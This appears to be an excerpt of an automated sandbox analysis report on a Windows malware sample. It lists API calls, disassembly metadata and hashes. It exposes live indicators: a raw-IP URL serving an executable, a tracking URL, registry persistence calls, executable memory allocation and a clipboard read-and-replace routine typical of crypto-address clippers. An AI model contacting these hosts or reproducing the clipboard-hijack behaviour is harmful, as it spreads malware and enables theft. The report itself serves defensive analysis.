                                                  • Snapshot File: hcaresult_0_2_2d29000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 3833638111-0
                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction ID: 1f231bf2031193c23c5343a4d13768c3191ab06ad8c134b837e448adf0801a81
                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction Fuzzy Hash: 7BF0F6321003307FD7203BF49C8CBAEB2E8EF5962CF205128E642911C0CB71EC098A60

                                                  Control-flow Graph (rendered graph not reproduced; first basic block at 432f49)
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                  • Instruction ID: d6ce50a492f9084338ba33edda2eca6d731db0489828e8dd55d9f9b17e416b32
                                                  • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                  • Instruction Fuzzy Hash: 6EC11370E04245AFDB11DFA9D841BAFBBB0BF0D305F08119AE815A7392C3789A41CB69

                                                  Control-flow Graph (rendered graph not reproduced; first basic block at 43d05c)
                                                  APIs
                                                    • Part of subcall function 0043CD2A: CreateFileW.KERNEL32(00000000,00000000,?,0043D105,?,?,00000000,?,0043D105,00000000,0000000C), ref: 0043CD47
                                                  • GetLastError.KERNEL32 ref: 0043D170
                                                  • __dosmaperr.LIBCMT ref: 0043D177
                                                  • GetFileType.KERNEL32(00000000), ref: 0043D183
                                                  • GetLastError.KERNEL32 ref: 0043D18D
                                                  • __dosmaperr.LIBCMT ref: 0043D196
                                                  • CloseHandle.KERNEL32(00000000), ref: 0043D1B6
                                                  • CloseHandle.KERNEL32(?), ref: 0043D300
                                                  • GetLastError.KERNEL32 ref: 0043D332
                                                  • __dosmaperr.LIBCMT ref: 0043D339
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                  • String ID:
                                                  • API String ID: 4237864984-0
                                                  • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                  • Instruction ID: 006e68bf3f1d2291baca7e3f3ccd15ce7d6f583b40adfd1c0386b5d8b5644812
                                                  • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                  • Instruction Fuzzy Hash: 70A13632E101049FDF19AF68EC917AE7BA0AF0A324F14115EF805AB3D1D7389D12CB5A

                                                  Control-flow Graph (rendered graph not reproduced; first basic block at 301003c)
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0301024D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID: cess$kernel32.dll
                                                  • API String ID: 4275171209-1230238691
                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction ID: 29c64c42d0fe0b4c7d55ef4d3b42be360208fd60e8719feb5e79f70b48f41c0a
                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction Fuzzy Hash: CF526975A01229DFDBA4CF58C984BADBBB1BF09304F1480D9E94DAB351DB30AA95CF14

                                                  Control-flow Graph

                                                  APIs
                                                  • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C47
                                                    • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                    • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E5F
                                                  • InternetCloseHandle.WININET(00000000), ref: 00402E70
                                                  • InternetCloseHandle.WININET(00000000), ref: 00402E73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Internet$CloseHandleOpen_wcslen
                                                  • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                  • API String ID: 3067768807-1501832161
                                                  • Opcode ID: a8bec4743929572fb9f32f475d47f4abd6f055372441a00394d7fc50db865c55
                                                  • Instruction ID: 48789f1b3701ba946f3e6b41f8bd096f2728906552624118b4e60daa7bc135c0
                                                  • Opcode Fuzzy Hash: a8bec4743929572fb9f32f475d47f4abd6f055372441a00394d7fc50db865c55
                                                  • Instruction Fuzzy Hash: 89516095A65344A8E320EFB0BC52F363378EF58712F10643BE518CB2B2E3B59944875E

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                  • String ID: %X@
                                                  • API String ID: 1687354797-3313093589
                                                  • Opcode ID: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                  • Instruction ID: b3e9ac138a89c9aab4b32a44e65933d882eee500b320c13cfd578e42c41f9d09
                                                  • Opcode Fuzzy Hash: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                  • Instruction Fuzzy Hash: 3D214172C042499ADF15EBE9D881BDEB7F8AF08318F14407FE504B72C1DB7D99488A69

                                                  Control-flow Graph

                                                  APIs
                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                  • ExitThread.KERNEL32 ref: 0042DFFA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorExitLastThread
                                                  • String ID: 11@$f(@
                                                  • API String ID: 1611280651-1277599000
                                                  • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                  • Instruction ID: 8ccfe30e394ff3a7da82f1aad20c2a43f0afb1cc8a6867a0b2db1ae1affa3120
                                                  • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                  • Instruction Fuzzy Hash: 5BF0C874600624AFDB04AFB1D80ABAD3B70FF49715F10056EF4055B392CB796955CB68

                                                  Control-flow Graph

                                                  APIs
                                                  • std::_Cnd_initX.LIBCPMT ref: 00405841
                                                  • __Cnd_signal.LIBCPMT ref: 0040584D
                                                  • std::_Cnd_initX.LIBCPMT ref: 00405862
                                                  • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405869
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                  • String ID:
                                                  • API String ID: 2059591211-0
                                                  • Opcode ID: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                  • Instruction ID: d72f8bc51fec51febc5e3899202a3526e07d3a061d0a8301a91111c4e624332c
                                                  • Opcode Fuzzy Hash: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                  • Instruction Fuzzy Hash: 20F0A7714007009BE7317762C817B0A77A0AF0031DF10883FF15A769E2CF7DA8544A5D

                                                  Control-flow Graph (rendered graph not reproduced; first basic block at 402980)
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 004029AF
                                                  • __fassign.LIBCMT ref: 004029BF
                                                    • Part of subcall function 00402843: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402926
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                  • String ID: 4+@
                                                  • API String ID: 2843524283-3700369575
                                                  • Opcode ID: d6927ac8dcf44b0011b1dce344e42bafe9dfab0a11997840a9f38d6492e0eb02
                                                  • Instruction ID: 257e808548a25f0c421a3fe296c20495207b494aef35f76eb7bec397418e7454
                                                  • Opcode Fuzzy Hash: d6927ac8dcf44b0011b1dce344e42bafe9dfab0a11997840a9f38d6492e0eb02
                                                  • Instruction Fuzzy Hash: 1801F9B1E0021C5ADB24FA25EC46BEF7768AB41304F0402FFA705E31C1D9785E45CA88

                                                  Control-flow Graph (rendered graph not reproduced; first basic block at 42e134)
                                                  APIs
                                                  • CreateThread.KERNEL32(?,?,Function_0002DFE0,00000000,?,?), ref: 0042E17D
                                                  • GetLastError.KERNEL32(?,?,?,?,?,0040CF33,00000000,00000000,?,?,00000000,?), ref: 0042E189
                                                  • __dosmaperr.LIBCMT ref: 0042E190
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: CreateErrorLastThread__dosmaperr
                                                  • String ID:
                                                  • API String ID: 2744730728-0
                                                  • Opcode ID: f788247bfe16cd787040539d6f1c9311eafedbd5b023f877c643640da45ad27a
                                                  • Instruction ID: e33ff4e630afc97a712763e24a24b73512c1ee0121ef7b9dc61686095db8a569
                                                  • Opcode Fuzzy Hash: f788247bfe16cd787040539d6f1c9311eafedbd5b023f877c643640da45ad27a
                                                  • Instruction Fuzzy Hash: 7F01D236600229ABDB119FA3FC05AAF3B69EF81360F50013AF91582210DB358921DBA8

                                                  Control-flow Graph (rendered graph not reproduced; first basic block at 434775)
                                                  APIs
                                                  • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDFA,00000000,00000002,0040DDFA,00000000,?,?,?,00434824,00000000,00000000,0040DDFA,00000002), ref: 004347AE
                                                  • GetLastError.KERNEL32(?,00434824,00000000,00000000,0040DDFA,00000002,?,0042C181,?,00000000,00000000,00000001,?,0040DDFA,?,0042C236), ref: 004347B8
                                                  • __dosmaperr.LIBCMT ref: 004347BF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastPointer__dosmaperr
                                                  • String ID:
                                                  • API String ID: 2336955059-0
                                                  • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                  • Instruction ID: 3f4161a45120eee3ca6c804ab5e0c8b7ff266a4415271cac2496bd2984e95623
                                                  • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                  • Instruction Fuzzy Hash: CC016836610114ABCB159FAADC058EF7B29EFCA730F24030AF814872C0EB74AD418794

                                                  Control-flow Graph (rendered graph not reproduced; first basic block at 402bcd)
                                                  APIs
                                                  • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BEF
                                                  • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C07
                                                  • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C17
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID:
                                                  • API String ID: 1818849710-0
                                                  • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                  • Instruction ID: 5f9d8f05081ab8e61a544dd9ed380a1f0a89feb258115cbe41ff1dcf5e2af099
                                                  • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                  • Instruction Fuzzy Hash: 75F0B4B650011CFFEB214F94DD89DAFBA7CEB417E9F100175FA01B2150D6B14E009664

                                                  Control-flow Graph (rendered graph not reproduced; first basic block at 42e094)
                                                  APIs
                                                    • Part of subcall function 00431F7E: GetLastError.KERNEL32(?,?,?,0042EAEE,00434D9C,?,00431F28,00000001,00000364,?,0042E005,00457910,00000010), ref: 00431F83
                                                    • Part of subcall function 00431F7E: _free.LIBCMT ref: 00431FB8
                                                    • Part of subcall function 00431F7E: SetLastError.KERNEL32(00000000), ref: 00431FEC
                                                  • ExitThread.KERNEL32 ref: 0042E0A6
                                                  • CloseHandle.KERNEL32(?,?,?,0042E1C6,?,?,0042E03D,00000000), ref: 0042E0CE
                                                  • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1C6,?,?,0042E03D,00000000), ref: 0042E0E4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                  • String ID:
                                                  • API String ID: 1198197534-0
                                                  • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                  • Instruction ID: 02d263aed51cb6b3bee4cffa2fb4446158e609bbc081d0db7e94150c61e2e04c
                                                  • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                  • Instruction Fuzzy Hash: 8FF05E302006347BDB356F27E808A5B3AA8AF05764F484726B924C37A1D7B8DD828698

                                                  Control-flow Graph (rendered graph not reproduced; first basic block at 43cfeb)
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: 'C
                                                  • API String ID: 269201875-3508614867
                                                  • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                  • Instruction ID: ac23cf383b269f77c0b068b48fc7cf8c71372a03a023b6a8bdb9567da4463856
                                                  • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                  • Instruction Fuzzy Hash: D0F09A32810008BBCF155E96EC01DDF3B6AEF89338F10115AFA1492150DA3A8A22ABA4
                                                  APIs
                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 004023E1
                                                  • PostQuitMessage.USER32(00000000), ref: 00402583
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: MessagePostProcQuitWindow
                                                  • String ID:
                                                  • API String ID: 3873111417-0
                                                  • Opcode ID: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                  • Instruction ID: f7540e8b067131d9abd8b97533556e050534cde561c52fa9c46de49641595c4f
                                                  • Opcode Fuzzy Hash: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                  • Instruction Fuzzy Hash: 91410C15A64384A9E730EFA5BD15B2537B0EF64762F10253BE528DB2F2E3B58580C30E
                                                  APIs
                                                  • Sleep.KERNEL32(0000215D), ref: 00401562
                                                    • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                    • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _wcslen$Sleep
                                                  • String ID: http://176.113.115.37/ScreenUpdateSync.exe
                                                  • API String ID: 3358372957-2681926500
                                                  • Opcode ID: ddfdc33ddaf944cd93ee91cdfc7456df5d56f708170e8b920f6740c66972ae79
                                                  • Instruction ID: a225884332a17bf582b8fadba65ee921369c39f73c189ef0fca73ca0a6338174
                                                  • Opcode Fuzzy Hash: ddfdc33ddaf944cd93ee91cdfc7456df5d56f708170e8b920f6740c66972ae79
                                                  • Instruction Fuzzy Hash: 6E318C15A6538094E230CFA5BC66B252330FFA8752F51253BD60CCB2F2E7A19583C71E
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000400,?,?,03010223,?,?), ref: 03010E19
                                                  • SetErrorMode.KERNEL32(00000000,?,?,03010223,?,?), ref: 03010E1E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction ID: eaa7b3b829bbe17f17affb38b45189ab451d72b32a1db896f519cb81e07c40e8
                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction Fuzzy Hash: 05D0123114512877DB502A95DC09BCDBB5CDF05B62F048011FB0DD9080C770954046E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                  • Instruction ID: c13f0aaa9ffca533a2c3afb5b433fd4ee60c85f45f94f80d5c2ee7b15d17ea23
                                                  • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                  • Instruction Fuzzy Hash: 2051C331A00218AFDB10DF59C840BEA7BA1EBC9364F19919AF809AB391C735FD42CB54
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: __fread_nolock
                                                  • String ID:
                                                  • API String ID: 2638373210-0
                                                  • Opcode ID: 2283a06a2fad5c3ceff95e800cd0e8c9cbaa35fb85d12550c614d86d70b6a1f3
                                                  • Instruction ID: b9260250dbf28f9d15b3c818f63209514cdecf0a47afbf9c4decfe0e49894dcf
                                                  • Opcode Fuzzy Hash: 2283a06a2fad5c3ceff95e800cd0e8c9cbaa35fb85d12550c614d86d70b6a1f3
                                                  • Instruction Fuzzy Hash: 95316AF5604716AFC710CF2AC880A1ABFA9BF84351F04C53EF84497791D739DA548B8A
                                                  APIs
                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402926
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Ios_base_dtorstd::ios_base::_
                                                  • String ID:
                                                  • API String ID: 323602529-0
                                                  • Opcode ID: ac15786566c7c12d7d6604bc2b543ac292efb61edc09540775426cdd15f97b46
                                                  • Instruction ID: 06a190b1af6bffd0b30009583d7beab466b865d2b1cdf6d05da26eaaeda62aaf
                                                  • Opcode Fuzzy Hash: ac15786566c7c12d7d6604bc2b543ac292efb61edc09540775426cdd15f97b46
                                                  • Instruction Fuzzy Hash: E3312CB4D002199BDB04EFA5C891AEDBBB4BF58304F5085AEE415B3681DB786A48CF54
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: H_prolog3_catch
                                                  • String ID:
                                                  • API String ID: 3886170330-0
                                                  • Opcode ID: 8f7dc48dcb05c21fbbcda5fcf12e76a98b4592d37682d1b18d39cb0d63f71a47
                                                  • Instruction ID: 130d185d73aa858ab00e75432ddc36e19440830dd378bf412e93c481dd82f4d6
                                                  • Opcode Fuzzy Hash: 8f7dc48dcb05c21fbbcda5fcf12e76a98b4592d37682d1b18d39cb0d63f71a47
                                                  • Instruction Fuzzy Hash: 98215870A00245EFCB11DF55C480EAEBBB5BF48704F2480AEE805AB391C778AE50CB94
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: __wsopen_s
                                                  • String ID:
                                                  • API String ID: 3347428461-0
                                                  • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                  • Instruction ID: 247e0a556512b48f7b921b083965eca1f7392b8622cfa12ec24d1c2ccd616764
                                                  • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                  • Instruction Fuzzy Hash: B511067590420AAFCB05DF58E94199A7BF4EF48314F10406AF809AB311D671EA158BA9
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                  • Instruction ID: 8b2e0ce5f68243881f48833c9379da8a786ec54fae66de81054fb87b7da3eb6a
                                                  • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                  • Instruction Fuzzy Hash: C9E0E5B1A046207ADA302FA65C06B5B3A48AF497B2F056133FC0592290FF2CDE4081AD
                                                  APIs
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004103E7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Exception@8Throw
                                                  • String ID:
                                                  • API String ID: 2005118841-0
                                                  • Opcode ID: d3dc0e7b799cf4addcb5e854e1870d6270b50bfba89a80199028074021f20c37
                                                  • Instruction ID: f0ff8e4b9f7cc01ea46f57855d09a1922a3c0907516a33a9cf8cca3f22e82038
                                                  • Opcode Fuzzy Hash: d3dc0e7b799cf4addcb5e854e1870d6270b50bfba89a80199028074021f20c37
                                                  • Instruction Fuzzy Hash: E8E02B3050030D76CB107A65FC1195E33381A00328F90413BBC24A14D1EF78F99D858D
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,00000000,?,0043D105,?,?,00000000,?,0043D105,00000000,0000000C), ref: 0043CD47
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                  • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                  • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                  • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02D29F7E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504249917.0000000002D29000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D29000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2d29000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction ID: fce88fbc4abbba0c1164d96201e8d9f4ee326715e2ef55a028cce1d6eb5dcf57
                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction Fuzzy Hash: B9112B79A00208EFDB01DF98C995E98BBF5EF08350F158094FA489B361D375EA90DF90
                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 03011951
                                                  • Sleep.KERNEL32(000011EB), ref: 0301195B
                                                    • Part of subcall function 0301CE9C: _strlen.LIBCMT ref: 0301CEB3
                                                  • OpenClipboard.USER32(00000000), ref: 03011988
                                                  • GetClipboardData.USER32(00000001), ref: 03011998
                                                  • _strlen.LIBCMT ref: 030119B4
                                                  • _strlen.LIBCMT ref: 030119E3
                                                  • _strlen.LIBCMT ref: 03011B27
                                                  • EmptyClipboard.USER32 ref: 03011B3D
                                                  • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 03011B4A
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 03011B74
                                                  • SetClipboardData.USER32(00000001,00000000), ref: 03011B7D
                                                  • GlobalFree.KERNEL32(00000000), ref: 03011B84
                                                  • CloseClipboard.USER32 ref: 03011BA8
